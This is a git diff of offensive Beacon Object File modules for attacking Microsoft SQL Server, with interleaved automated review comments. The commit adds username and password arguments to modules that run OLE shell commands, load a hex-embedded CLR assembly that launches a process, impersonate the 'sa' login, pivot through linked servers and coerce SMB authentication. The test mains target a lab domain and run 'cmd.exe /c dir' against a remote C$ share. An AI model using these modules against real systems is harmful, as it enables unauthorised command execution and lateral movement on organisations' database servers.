BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); @@ -243,6 +247,8 @@ VOID go( server = *server == 0 ? "localhost" : server; database = *database == 0 ? "master" : database; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -273,7 +279,7 @@ VOID go( } hexBytes[dwDllBufferSize * 2] = '\0'; - ExecuteClrAssembly(server, database, link, impersonate, function, hash, hexBytes); + ExecuteClrAssembly(server, user, password, database, link, impersonate, function, hash, hexBytes); intFree(hexBytes); printoutput(TRUE); }; 
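Review bot: `hash` is supplied by the task script (computed there as `sha512(assembly.content)`) and is handed to `ExecuteClrAssembly` alongside the locally hex-encoded `hexBytes`; nothing in this hunk ties the two together, so if the hex conversion ever truncates (the buffer is sized `dwDllBufferSize * 2` plus the terminator written just above) the registered hash and the uploaded bytes would silently disagree. If `ExecuteClrAssembly` uses the hash for `sp_add_trusted_assembly`, consider computing it in the BOF over the same bytes that are hex-encoded rather than trusting the packed value, or at minimum document the contract at the call: `// hash must be the SHA-512 of exactly the bytes hex-encoded into hexBytes`. `go` continues outside the hunk.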
@@ -289,13 +295,13 @@ int main() char* bytes = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300607eef640000000000000000e00002210b010b00000400000006000000000000ce2300000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000007c2300004f00000000400000b802000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000d4030000002000000004000000020000000000000000000000000000200000602e72737263000000b8020000004000000004000000060000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000000a00000000000000000000000000004000004200000000000000000000000000000000b02300000000000048000000020005006820000014030000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000036007201000070280400000a262a1e02280500000a2a000042534a4201000100000000000c00000076342e302e33303331390000000005006c0000001c010000237e0000880100001401000023537472696e6773000000009c0200001c00000023555300b8020000100000002347554944000000c80200004c00000023426c6f620000000000000002000001471400000900000000fa253300160000010000000500000002000000020000000500000003000000010000000300000000000a0001000000000006003d0036000600780058000600980058000a00dd00c2000e000601f3000000000001000000000001000100010010001c000000050001000100502000000000960044000a0001005e2000000000861852000e000100110052001200190052000e00210052000e0029000e011c00090052000e0020001b0017002e000b0022002e0013002b000480000000000000000000000000000000004400000004000000000000000000000001002d000000000004000000000000000000
00000100b6000000000004000000000000000000000001003600000000000000003c4d6f64756c653e0043726561746550726f636573732e646c6c0053746f72656450726f63656475726573006d73636f726c69620053797374656d004f626a6563740043726561746550726f63657373002e63746f720053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c6974794174747269627574650053797374656d2e44617461004d6963726f736f66742e53716c5365727665722e5365727665720053716c50726f6365647572654174747269627574650053797374656d2e446961676e6f73746963730050726f636573730053746172740000176e006f00740065007000610064002e0065007800650000000000e9bbd494c7999b429267cfb509264f810008b77a5c561934e08903000001032000010420010108040100000005000112150e0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010000a42300000000000000000000be230000002000000000000000000000000000000000000000000000b0230000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c02000000000000000000005c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000000000000000000000000000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc010000010053007400720069006e006700460069006c00650049006e0066006f0000009801000001003000300030003000300034006200300000002c0002000100460069006c0065004400650073006300720069007000740069006f006e000000000020000000300008000100460069006c006500560065007200730069006f006e000000000030002e0030002e0030002e003000000044001200010049006e007400650072006e0061006c004e0061006d00650000004300720065006100
74006500500072006f0063006500730073002e0064006c006c0000002800020001004c006500670061006c0043006f0070007900720069006700680074000000200000004c00120001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000430072006500610074006500500072006f0063006500730073002e0064006c006c000000340008000100500072006f006400750063007400560065007200730069006f006e00000030002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000030002e0030002e0030002ec000000dinternal_printf("============ BASE TEST ============\n\n"); - ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); + ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); + ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); + ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", NULL, 
NULL, "master", "BRAAVOS", NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); } #endif diff --git a/src/SQL/columns/entry.c b/src/SQL/columns/entry.c index b8912cf..81db199 100644 --- a/src/SQL/columns/entry.c +++ b/src/SQL/columns/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckTableColumns(char* server, char* database, char* link, char* impersonate, char* table) +void CheckTableColumns(char* server, char *user, char* password, char* database, char* link, char* impersonate, char* table) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckTableColumns(char* server, char* database, char* link, char* impersona if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -131,6 +131,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* table; char* link; @@ -143,6 +145,8 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); table = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); @@ -150,6 +154,8 @@ VOID go( server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; table = *table == 0 ? NULL : table; link = *link == 0 ? NULL : link; @@ -172,7 +178,7 @@ VOID go( return; } - CheckTableColumns(server, database, link, impersonate, table); + CheckTableColumns(server, user, password, database, link, impersonate, table); printoutput(TRUE); }; 
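Review bot: The new CheckTableColumns signature mixes pointer styles, `char *user, char* password`, while every other signature changed in this commit uses the `char* name` form; `char* user` keeps it uniform. This is the only asterisk-on-identifier occurrence in the diff, so it reads as a typo rather than a convention. CheckTableColumns continues beyond the hunk.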
@@ -182,13 +188,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckTableColumns("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "spt_monitor"); + CheckTableColumns("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "spt_monitor"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckTableColumns("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "spt_monitor"); + CheckTableColumns("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "spt_monitor"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckTableColumns("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "spt_monitor"); + CheckTableColumns("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "spt_monitor"); } #endif diff --git a/src/SQL/databases/entry.c b/src/SQL/databases/entry.c index c12bd61..71bdd6a 100644 --- a/src/SQL/databases/entry.c +++ b/src/SQL/databases/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckDatabases(char* server, char* database, char* link, char* impersonate) +void CheckDatabases(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckDatabases(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -67,6 +67,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -78,11 +80,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -97,7 +103,7 @@ VOID go( return; } - CheckDatabases(server, database, link, impersonate); + CheckDatabases(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -107,13 +113,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckDatabases("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckDatabases("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckDatabases("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckDatabases("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckDatabases("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckDatabases("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/impersonate/entry.c b/src/SQL/impersonate/entry.c index d5f78de..f1a7818 100644 --- a/src/SQL/impersonate/entry.c +++ b/src/SQL/impersonate/entry.c 
@@ -3,14 +3,14 @@ #include "sql.c" -void CheckImpersonate(char* server, char* database) +void CheckImpersonate(char* server, char* user, char* password, char* database) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLRETURN ret; - SQLHDBC dbc = ConnectToSqlServer(&env, server, database); + SQLHDBC dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { @@ -53,6 +53,8 @@ VOID go( ) { char* server = NULL; + char* user = NULL; + char* password = NULL; char* database = NULL; // @@ -62,9 +64,13 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; if(!bofstart()) @@ -72,7 +78,7 @@ VOID go( return; } - CheckImpersonate(server, database); + CheckImpersonate(server, user, password, database); printoutput(TRUE); }; @@ -82,7 +88,7 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckImpersonate("castelblack.north.sevenkingdoms.local", "master"); + CheckImpersonate("castelblack.north.sevenkingdoms.local", NULL, NULL, "master"); } #endif diff --git a/src/SQL/info/entry.c b/src/SQL/info/entry.c index 1daea4a..dee303a 100644 --- a/src/SQL/info/entry.c +++ b/src/SQL/info/entry.c @@ -58,14 +58,14 @@ void FreeSqlInfo(SQLINFO* info) { } -void GetSQLInfo(char* server, char* database) { +void GetSQLInfo(char* server, char* user, char* password, char* database) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLRETURN ret; SQLINFO info; memset(&info, 0, sizeof(SQLINFO)); - SQLHDBC dbc = ConnectToSqlServer(&env, server, database); + SQLHDBC dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { 
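Review bot: `void CheckImpersonate(char* server, char* user, char* password, char* database)` gains two parameters with no comment on what NULL means for them; the only hint is the `*user == 0 ? NULL : user` normalisation in go(), which maps an empty wire field to NULL. A one-line comment above the signature stating which authentication mode a NULL user/password pair selects (the decision itself lives in ConnectToSqlServer, outside this diff) would document the contract at the one place each module reads it. The same applies to GetSQLInfo in info/entry.c and the other widened signatures in this commit. CheckImpersonate and go() both extend beyond the hunks shown.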
@@ -409,6 +409,8 @@ VOID go( ) { char* server = NULL; + char* user = NULL; + char* password = NULL; char* database = NULL; // @@ -417,9 +419,13 @@ VOID go( datap parser; BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; if(!bofstart()) @@ -427,7 +433,7 @@ VOID go( return; } - GetSQLInfo(server, database); + GetSQLInfo(server, user, password, database); printoutput(TRUE); }; @@ -437,7 +443,7 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - GetSQLInfo("castelblack.north.sevenkingdoms.local", "master"); + GetSQLInfo("castelblack.north.sevenkingdoms.local", NULL, NULL, "master"); } #endif diff --git a/src/SQL/links/entry.c b/src/SQL/links/entry.c index 12add49..83ddb0b 100644 --- a/src/SQL/links/entry.c +++ b/src/SQL/links/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckLinks(char* server, char* database, char* link, char* impersonate) +void CheckLinks(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -12,11 +12,11 @@ void CheckLinks(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -60,6 +60,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -71,11 +73,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -90,7 +96,7 @@ VOID go( return; } - CheckLinks(server, database, link, impersonate); + CheckLinks(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -100,13 +106,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckLinks("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckLinks("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckLinks("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckLinks("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckLinks("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckLinks("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/olecmd/entry.c b/src/SQL/olecmd/entry.c index 9d47073..97f0fd9 100644 --- a/src/SQL/olecmd/entry.c +++ b/src/SQL/olecmd/entry.c @@ -4,7 +4,7 @@ #include "sql_modules.c" -void ExecuteOleCmd(char* server, char* database, char* link, char* impersonate, char* command) +void ExecuteOleCmd(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* command) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; 
@@ -16,11 +16,11 @@ void ExecuteOleCmd(char* server, char* database, char* link, char* impersonate, if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -160,6 +160,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -172,12 +174,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); command = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -192,7 +198,7 @@ VOID go( return; } - ExecuteOleCmd(server, database, link, impersonate, command); + ExecuteOleCmd(server, user, password, database, link, impersonate, command); printoutput(TRUE); }; 
@@ -202,13 +208,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - ExecuteOleCmd("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); + ExecuteOleCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteOleCmd("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "cmd.exe /c dir \\\\10.2.99.1\\c$"); + ExecuteOleCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "cmd.exe /c dir \\\\10.2.99.1\\c$"); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteOleCmd("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); + ExecuteOleCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); } #endif diff --git a/src/SQL/query/entry.c b/src/SQL/query/entry.c index b3a4cac..86f484a 100644 --- a/src/SQL/query/entry.c +++ b/src/SQL/query/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CustomQuery(char* server, char* database, char* link, char* impersonate, char* query) +void CustomQuery(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* query) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CustomQuery(char* server, char* database, char* link, char* impersonate, ch if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -65,6 +65,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -77,12 +79,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); query = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -102,7 +108,7 @@ VOID go( return; } - CustomQuery(server, database, link, impersonate, query); + CustomQuery(server, user, password, database, link, impersonate, query); printoutput(TRUE); }; @@ -112,13 +118,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CustomQuery("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "SELECT name, database_id FROM sys.databases;"); + CustomQuery("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "SELECT name, database_id FROM sys.databases;"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CustomQuery("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "SELECT name, database_id FROM sys.databases;"); + CustomQuery("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "SELECT name, database_id FROM sys.databases;"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CustomQuery("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "SELECT name, database_id FROM sys.databases;"); + CustomQuery("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "SELECT name, database_id FROM sys.databases;"); } #endif diff --git a/src/SQL/rows/entry.c b/src/SQL/rows/entry.c index 128c1ec..6af2fa7 100644 
--- a/src/SQL/rows/entry.c +++ b/src/SQL/rows/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckTableRows(char* server, char* database, char* link, char* impersonate, char* table) +void CheckTableRows(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* table) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -16,11 +16,11 @@ void CheckTableRows(char* server, char* database, char* link, char* impersonate, if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -156,6 +156,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* table; char* link; @@ -168,6 +170,8 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); table = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); @@ -175,6 +179,8 @@ VOID go( server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; table = *table == 0 ? NULL : table; link = *link == 0 ? NULL : link; @@ -197,7 +203,7 @@ VOID go( return; } - CheckTableRows(server, database, link, impersonate, table); + CheckTableRows(server, user, password, database, link, impersonate, table); printoutput(TRUE); }; 
@@ -207,13 +213,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckTableRows("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "spt_monitor"); + CheckTableRows("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "spt_monitor"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckTableRows("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "spt_monitor"); + CheckTableRows("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "spt_monitor"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckTableRows("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "spt_monitor"); + CheckTableRows("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "spt_monitor"); } #endif diff --git a/src/SQL/search/entry.c b/src/SQL/search/entry.c index 28e22bb..65a4273 100644 --- a/src/SQL/search/entry.c +++ b/src/SQL/search/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void Search(char* server, char* database, char* link, char* impersonate, char* keyword) +void Search(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* keyword) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -14,11 +14,11 @@ void Search(char* server, char* database, char* link, char* impersonate, char* k if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -84,6 +84,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -96,12 +98,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); keyword = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -116,7 +122,7 @@ VOID go( return; } - Search(server, database, link, impersonate, keyword); + Search(server, user, password, database, link, impersonate, keyword); printoutput(TRUE); }; @@ -126,13 +132,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - Search("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "idle"); + Search("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "idle"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - Search("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "idle"); + Search("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "idle"); internal_printf("\n\n============ LINK TEST ============\n\n"); - Search("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "idle"); + Search("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "idle"); } #endif diff --git a/src/SQL/smb/entry.c b/src/SQL/smb/entry.c index 4b6be88..84d3c5e 100644 --- a/src/SQL/smb/entry.c +++ b/src/SQL/smb/entry.c 
@@ -3,7 +3,7 @@ #include "sql.c" -void CoerceSmb(char* server, char* database, char* link, char* impersonate, char* listener) +void CoerceSmb(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* listener) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -15,11 +15,11 @@ void CoerceSmb(char* server, char* database, char* link, char* impersonate, char if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -82,6 +82,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -94,12 +96,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); listener = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -114,7 +120,7 @@ VOID go( return; } - CoerceSmb(server, database, link, impersonate, listener); + CoerceSmb(server, user, password, database, link, impersonate, listener); printoutput(TRUE); }; 
